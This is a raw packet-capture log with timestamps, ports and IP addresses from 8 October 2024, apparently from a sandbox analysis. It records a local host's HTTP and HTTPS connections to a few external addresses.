Oct 8, 2024 20:47:37.336864948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.336867094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.336879969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.336915970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.336919069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.336942911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.336968899 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.336971045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.336997032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.337019920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.337027073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.337054014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.337078094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.337081909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.337101936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.337130070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.341963053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.341993093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.342014074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.342020035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.342040062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.342063904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.342616081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.342643976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.342664003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.342685938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.342722893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.342750072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.342767000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.342793941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.342802048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.342828989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.342847109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.342859030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.342870951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.342906952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.342910051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.342956066 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.342961073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.342988014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.343004942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.343027115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.346899986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.347001076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.347002983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.347031116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.347064972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.347074032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.347822905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.347851038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.347875118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.347882986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.347889900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.347927094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:37.347965956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.347992897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.348020077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.348052025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.348100901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.348128080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.348154068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.352036953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.352063894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.352091074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.352741003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.353039026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.353087902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.353115082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:37.413511038 CEST	443	49855	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.413615942 CEST	443	49855	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.413683891 CEST	49855	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.413909912 CEST	49855	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.413925886 CEST	443	49855	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.413950920 CEST	49855	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.413954973 CEST	443	49855	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.416870117 CEST	49860	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.416893005 CEST	443	49860	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.416970015 CEST	49860	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.417117119 CEST	49860	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.417126894 CEST	443	49860	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.422878027 CEST	443	49856	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.423357010 CEST	49856	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.423435926 CEST	443	49856	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.423768997 CEST	49856	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.423784971 CEST	443	49856	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.428097010 CEST	443	49858	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.428217888 CEST	443	49857	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.428395033 CEST	49858	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.428468943 CEST	443	49858	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.428510904 CEST	49857	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.428544044 CEST	443	49857	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.428775072 CEST	49858	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.428786039 CEST	443	49858	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.428944111 CEST	49857	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.428955078 CEST	443	49857	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.440078020 CEST	443	49859	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.440390110 CEST	49859	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.440411091 CEST	443	49859	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.440726042 CEST	49859	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.440737963 CEST	443	49859	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.527014971 CEST	443	49856	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.527339935 CEST	443	49856	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.527379990 CEST	443	49856	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.527430058 CEST	49856	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.527475119 CEST	49856	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.527523041 CEST	49856	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.527556896 CEST	443	49856	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.527615070 CEST	49856	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.527631044 CEST	443	49856	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.530477047 CEST	49861	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.530550003 CEST	443	49861	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.530673027 CEST	49861	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.530817986 CEST	49861	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.530838966 CEST	443	49861	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.531014919 CEST	443	49858	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.531166077 CEST	443	49858	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.531352997 CEST	49858	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.531353951 CEST	49858	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.531353951 CEST	49858	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.531908989 CEST	443	49857	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.532344103 CEST	443	49857	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.532412052 CEST	49857	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.532445908 CEST	49857	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.532490969 CEST	443	49857	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.532522917 CEST	49857	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.532538891 CEST	443	49857	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.533479929 CEST	49862	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.533504963 CEST	443	49862	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.533581972 CEST	49862	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.533679962 CEST	49862	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.533706903 CEST	443	49862	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.534240961 CEST	49863	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.534276009 CEST	443	49863	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.534337044 CEST	49863	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.534420013 CEST	49863	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.534434080 CEST	443	49863	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.543199062 CEST	443	49859	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.543534994 CEST	443	49859	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.543595076 CEST	49859	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.543636084 CEST	49859	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.543636084 CEST	49859	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.543653965 CEST	443	49859	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.543669939 CEST	443	49859	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.545499086 CEST	49864	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.545561075 CEST	443	49864	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.545641899 CEST	49864	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.545790911 CEST	49864	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.545814037 CEST	443	49864	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:37.842148066 CEST	49858	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:37.842175007 CEST	443	49858	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.048521996 CEST	443	49860	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.049165010 CEST	49860	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.049199104 CEST	443	49860	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.049595118 CEST	49860	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.049599886 CEST	443	49860	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.147948980 CEST	443	49860	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.148469925 CEST	443	49860	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.148504972 CEST	443	49860	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.148535013 CEST	49860	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.148691893 CEST	49860	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.148691893 CEST	49860	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.148691893 CEST	49860	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.151638031 CEST	49865	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.151674986 CEST	443	49865	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.151747942 CEST	49865	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.151879072 CEST	49865	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.151900053 CEST	443	49865	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.179796934 CEST	443	49861	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.180480003 CEST	49861	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.180557966 CEST	443	49861	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.181029081 CEST	49861	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.181041956 CEST	443	49861	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.198721886 CEST	443	49864	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.199157953 CEST	49864	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.199199915 CEST	443	49864	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.199367046 CEST	49864	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.199379921 CEST	443	49864	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.214873075 CEST	443	49863	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.215177059 CEST	49863	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.215205908 CEST	443	49863	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.215583086 CEST	49863	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.215589046 CEST	443	49863	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.224869013 CEST	443	49862	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.225110054 CEST	49862	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.225161076 CEST	443	49862	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.225501060 CEST	49862	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.225513935 CEST	443	49862	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.281485081 CEST	443	49861	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.281713009 CEST	443	49861	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.282037020 CEST	49861	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.282037020 CEST	49861	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.282037020 CEST	49861	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.284966946 CEST	49866	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.284996986 CEST	443	49866	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.285074949 CEST	49866	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.285196066 CEST	49866	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.285212994 CEST	443	49866	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.298991919 CEST	443	49864	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.299118996 CEST	443	49864	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.299294949 CEST	49864	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.299294949 CEST	49864	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.299294949 CEST	49864	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.301510096 CEST	49867	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.301564932 CEST	443	49867	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.301652908 CEST	49867	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.301810026 CEST	49867	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.301831961 CEST	443	49867	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.319679976 CEST	443	49863	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.319813013 CEST	443	49863	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.319890976 CEST	49863	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.320039988 CEST	49863	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.320039988 CEST	49863	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.320051908 CEST	443	49863	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.320059061 CEST	443	49863	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.321887970 CEST	49868	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.321975946 CEST	443	49868	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.322058916 CEST	49868	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.322202921 CEST	49868	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.322238922 CEST	443	49868	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.331835985 CEST	443	49862	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.331856966 CEST	443	49862	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.331892967 CEST	443	49862	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.331924915 CEST	49862	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.331953049 CEST	49862	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.332086086 CEST	49862	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.332115889 CEST	443	49862	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.332156897 CEST	49862	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.332170963 CEST	443	49862	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.333892107 CEST	49869	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.333964109 CEST	443	49869	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.334054947 CEST	49869	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.334167957 CEST	49869	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.334201097 CEST	443	49869	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.451513052 CEST	49860	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.451539993 CEST	443	49860	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.592216969 CEST	49861	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.592263937 CEST	443	49861	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.607789993 CEST	49864	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.607846975 CEST	443	49864	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.704828024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:38.704942942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:38.708663940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:38.713872910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:38.814091921 CEST	443	49865	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.814635992 CEST	49865	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.814654112 CEST	443	49865	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.815108061 CEST	49865	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.815119028 CEST	443	49865	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.918240070 CEST	443	49865	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.918524027 CEST	443	49865	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.920392036 CEST	49865	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.920669079 CEST	49865	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.920686960 CEST	443	49865	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.920713902 CEST	49865	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.920720100 CEST	443	49865	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.924036980 CEST	49870	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.924117088 CEST	443	49870	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.924217939 CEST	49870	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.924386978 CEST	49870	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.924421072 CEST	443	49870	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.936183929 CEST	443	49866	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.936568022 CEST	49866	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.936578989 CEST	443	49866	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.937068939 CEST	49866	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.937074900 CEST	443	49866	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.962310076 CEST	443	49868	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.962780952 CEST	49868	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.962833881 CEST	443	49868	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.962965965 CEST	49868	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.962979078 CEST	443	49868	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.972259045 CEST	443	49867	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.972593069 CEST	49867	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.972629070 CEST	443	49867	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.972943068 CEST	49867	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.972958088 CEST	443	49867	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.983000040 CEST	443	49869	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.983428955 CEST	49869	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.983447075 CEST	443	49869	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:38.983814001 CEST	49869	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:38.983824015 CEST	443	49869	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.035753965 CEST	443	49866	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.035928011 CEST	443	49866	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.035962105 CEST	443	49866	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.036005974 CEST	49866	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.036056042 CEST	49866	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.036067963 CEST	443	49866	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.036079884 CEST	49866	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.036092997 CEST	443	49866	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.038593054 CEST	49871	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.038657904 CEST	443	49871	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.038743019 CEST	49871	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.038868904 CEST	49871	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.038908958 CEST	443	49871	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.064660072 CEST	443	49868	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.064785004 CEST	443	49868	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.064888000 CEST	443	49868	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.064944029 CEST	49868	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.064987898 CEST	49868	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.065015078 CEST	443	49868	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.065040112 CEST	49868	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.065052986 CEST	443	49868	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.067807913 CEST	49872	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.067847013 CEST	443	49872	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.067910910 CEST	49872	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.068011045 CEST	49872	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.068030119 CEST	443	49872	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.074542999 CEST	443	49867	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.075110912 CEST	443	49867	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.075190067 CEST	49867	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.075242043 CEST	49867	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.075242043 CEST	49867	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.075269938 CEST	443	49867	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.075294018 CEST	443	49867	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.077369928 CEST	49873	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.077400923 CEST	443	49873	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.077480078 CEST	49873	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.077569962 CEST	49873	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.077580929 CEST	443	49873	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.084651947 CEST	443	49869	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.084983110 CEST	443	49869	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.085051060 CEST	49869	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.085213900 CEST	49869	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.085232019 CEST	443	49869	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.085247040 CEST	49869	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.085253000 CEST	443	49869	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.087004900 CEST	49874	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.087013006 CEST	443	49874	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.087096930 CEST	49874	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.087218046 CEST	49874	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:39.087227106 CEST	443	49874	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:39.406672955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:39.406888962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:39.445099115 CEST	49875	80	192.168.2.5	147.45.44.104
